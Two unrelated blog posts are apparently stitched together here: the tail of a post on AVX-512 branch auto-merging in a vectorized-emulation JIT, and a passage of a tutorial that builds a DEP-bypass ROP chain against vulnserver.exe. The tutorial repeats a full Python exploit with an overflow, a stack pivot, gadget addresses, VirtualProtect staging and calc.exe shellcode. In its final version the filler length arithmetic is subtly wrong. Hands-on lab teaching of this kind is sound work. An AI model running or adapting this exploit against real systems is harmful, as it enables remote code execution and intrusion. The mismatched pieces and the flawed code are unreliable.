The branch target vector

branch targets

Now we start constructing zmm0… this is going to hold the “labels” for the targets each active lane wants to go to. Think of these “labels” as just a unique identifier for the target block they are branching to. In this case we use the constant storage database (pointed to by r11) to load up the target labels. We first load the “true target” labels into zmm0 by using the k2 kmask, the “true” kmask. After this, we merge the “false target” labels into zmm0 using k3, the “false/inverted” kmask.

After these 2 instructions execute, zmm0 now holds the target “labels” based on their corresponding comparison results. zmm0 now tells us where the currently executing VMs “want to” branch to.

The merge into master

merge into master

Now we merge the target branches for the active VMs which were just computed (zmm0), into the master target register (zmm31). Since VMs can be disabled via divergence, zmm31 holds the “master” copy of where all VMs want to go (including ones which have been masked off and are “waiting” to execute a certain target).

zmm31 now holds the target labels for every single lane with the updated results of this comparison!

Broadcasting the target

broadcasting the target

Now that we have zmm31 containing all of the branch targets, we now have to pick the one we are going to follow. To do this, we want a vector which contains the broadcasted target label of the VM we are following. As mentioned in the JIT calling convention section, zmm30 contains the index of the VM we are following in all 8 lanes.

Example

Lets say for example we are following VM #4 (zero-indexed).

zmm30 contains [4, 4, 4, 4, 4, 4, 4, 4]

zmm31 contains [block_0, block_0, block_1, block_1, block_2, block_2, block_2, block_2]

After the vpermq instruction we now have zmm1 containing [block_2, block_2, block_2, block_2, block_2, block_2, block_2, block_2].

Effectively, zmm1 will contain the block label for the target that the VM we are following is going to go to. This is ultimately the block we will be jumping to!

Auto-merging

auto-merging

This is where the magic happens. zmm31 contains where all the VMs “want to execute”, and zmm1 from the above instruction contains where we are actually going to execute. Thus, we compute a new k1 (active VM kmask) based on equality between zmm31 and zmm1.

Or in more simple terms… if a VM that was previously disabled was waiting to execute the block we’re about to go execute… bring it back online!
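
In plain Python terms (an 8-lane toy model of the description above, not the real JIT), the auto-merge boils down to this:

# Where each of the 8 VMs "wants" to go (zmm31) and which VM we follow (zmm30)
zmm31  = ["blk_true", "blk_false", "blk_true", "blk_false",
          "blk_true", "blk_true", "blk_false", "blk_false"]
follow = 0   # index of the VM we are following

# vpermq: broadcast the followed VM's target into every lane (zmm1)
zmm1 = [zmm31[follow]] * 8

# Equality compare between zmm31 and zmm1 rebuilds k1: any lane that wants the
# block we are about to execute comes (back) online
k1 = 0
for lane in range(8):
    if zmm31[lane] == zmm1[lane]:
        k1 |= 1 << lane

print(bin(k1))   # 0b110101 -> lanes 0, 2, 4 and 5 are (re)enabled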

Doin’ the branch

branching

Now we’re at the end. k2 still holds the true targets. We and this with k7 (the “following” VM mask) to figure out if the VM we are following is going to take the branch or not.

We then need to make this result “actionable” by getting it into the eflags x86 register such that we can conditionally branch. This is done with a simple kortestw instruction of k2 with itself. This will cause the zero flag to get set in eflags if k2 is equal to zero.

Once this is done, we can do a jnz instruction (same as jne), causing us to jump to the true target path if the k2 value is non-zero (if the VM we’re following is taking the true path). Otherwise we fall through to the “false” path (or potentially branch to it if it’s not directly following this block).


Update

After a little nap, I realized that I could save 2 instructions during the conditional branch. I knew something was a little off as I’ve written similar code before and I never needed an inverse mask.

updated JIT

Here we’ll note that we removed 2 instructions. We no longer compute the inverse mask. Instead, we initially store the false target block labels into zmm31 using the online mask (k1). This temporarily marks that “all online VMs want to take the false target”. Then, using the k2 mask (true targets), merge over zmm31 with the true target block labels.

Simple! We remove the inverse mask computation kandnw, and the use of the zmm0 temporary and merge directly into zmm31. But the effect is exactly the same as the previous version.

Not quite sure why I thought the inverse mask was needed, but it goes to show that a little bit of rest goes a long way!

Due to instruction decode pressure on the Xeon Phi (2 instructions decoded per cycle), this change is a minimum 1 cycle improvement. Further, it’s a reduction of 8 bytes of code per conditional branch, which reduces L1i pressure. This is likely in the single digit percentages for overall JIT speedup, as conditional branches are everywhere!


Fin

And that’s it! That’s currently how I handle auto-merging during conditional branches in vectorized emulation as of today! This code is often changed and this is probably not its final form. There might be a simpler way to achieve this (fewer instructions, or lower latency instructions)… but progress always happens over time :)

It’s important to note that this auto-merging isn’t perfect, and most cases will result in VMs hanging, but this is an extremely low cost way to bring VMs online dynamically in even the tightest loops. More macro-scale merging can be done with smarter static-analysis and control flow decisions.

I hope this was a fun read! Let me know if you want more of these mini-blogs.


Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00

Introduction

Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.

    OR

  • The ability to execute memory.

But not both.

What this means, is that someone cannot write AND execute memory at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jmp stack pointer instruction would suffice- and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode- you will be able to write to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted- an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, here are the four policy settings:

Knowing the applicable information on how DEP is implemented, figuring how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP, is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

lpAddress = A pointer to the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)
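
For reference, here is what the same call looks like when made legitimately from Python with ctypes (purely illustrative- in the exploit we obviously cannot just call the function like this, which is exactly why we need ROP to stage these arguments on the stack):

import ctypes
from ctypes import wintypes

kernel32 = ctypes.windll.kernel32

buf = ctypes.create_string_buffer("\x90" * 0x1000)   # pretend this buffer holds our shellcode
old_protect = wintypes.DWORD(0)

result = kernel32.VirtualProtect(
    ctypes.addressof(buf),          # lpAddress
    0x1000,                         # dwSize
    0x40,                           # flNewProtect (PAGE_EXECUTE_READWRITE)
    ctypes.byref(old_protect)       # lpflOldProtect (any writeable address)
)
print(result)
print(hex(old_protect.value))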

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get run?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

“How is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason why ROP is called Return Oriented Programming, is because each gadget’s instructions are always followed by a ret instruction. Each set of ASM instructions + ret is known as a ROP gadget. Whenever these gadgets are loaded consecutively one after the other, this is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever is located in the stack pointer (on top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, the ret instruction will simply return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening, until there are no more left! This makes life a bit easier.

POC

Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+filler)
s.close()

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f option specifies the file. The -r option specifies the maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find an lpflOldProtect address. You can place literally any address in this parameter, as long as it has writeable permissions.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+parameters+padding+shellcode+filler)
s.close()

Before moving on, you may have noticed an extra placeholder called return address added into the POC. This is not a part of the official parameters for VirtualProtect(). The reason this address is there (and right under the VirtualProtect() function) is because whenever the call to the function occurs, there needs to be a way to execute our shellcode. The return address is going to contain the address of the shellcode- so the application will jump straight to the user supplied shellcode after VirtualProtect() runs. The location of the shellcode will be marked as read, write, and execute.

One last thing. The reason we are adding the shellcode now, is because of one of the properties of DEP. The shellcode will not be executed until we change the permissions of DEP. It is written in advance because DEP will allow us to write to the stack, so long as we are not executing.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that the Windows API, when called, takes the items on the top of the stack (the stack pointer) as the parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP all of the supplied data is on the stack).

As you can see, all of the parameters are there. Here, at a high level, is how we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead what we will do, is put the calculated values needed to call VirtualProtect() into a register. Then, we will change the memory addresses of the placeholders we currently have, to point to our calculated values. An example would be, we could get the value for lpAddress into a register. Then, using ROP, we could make the current placeholder for lpAddress point to that register, where the intended value (real value) of lpAddress is.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

The state of the registers after the two ROP gadgets (remember to place breakpoint on the stack pivot ret instruction and step through with F7 in each debugging step):

As you can see from the POC above, the parameters to VirtualProtect are next up on the stack after the first two ROP gadgets are executed. Since we do not want to overwrite those parameters, we simply would like to “jump” over them for now. To do this, we can simply add to the current value of ESP, with an add esp, VALUE + ret ROP gadget. This will change the value of ESP to be a greater value than the current stack pointer (which currently contains the call to VirtualProtect()). This means we will be farther down in the stack (past the VirtualProtect() call). Since all of our ROP gadgets are ending with a ret, the new stack pointer (which is greater) will be loaded into EIP, because of the ret instruction in the add esp, VALUE + ret. This will make more sense in the screenshots that will be outlined below showing the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll
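
As a sanity check, 0x1C lines up exactly with the data we want to hop over in the updated POC below:

6 dwords (VirtualProtect() address + return + lpAddress + size + flNewProtect + pOldProtect) = 24 bytes
4 bytes of NOP padding placed after the parameters                                           =  4 bytes
Total skipped                                                                                = 28 bytes = 0x1C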

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take ESP (0xDEADBEEF) and load it into EIP. What this means, is that if successful, we will have successfully jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now all of the semantics have been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes away from the return address parameter. Let’s change the value in ECX to equal the value of the return parameter.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains the address of the return parameter placeholder. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the return address, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add “dummy” data directly AFTER the first ROP gadget. That way, that “dummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)


# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

The below screenshots show the stack and registers right before the pop ebp instruction executes. Notice that the stack slot the current gadget address was loaded from sits one DWORD above the current ESP; ESP itself now holds a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment):

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now, our shellcode is about 0x100 bytes (256 bytes in decimal) away from the current return and lpAddress placeholders. Remember earlier when we saved the old stack pointer into two registers, EAX and ECX? Recall also that we have already manipulated ECX to equal the address of the return parameter placeholder.

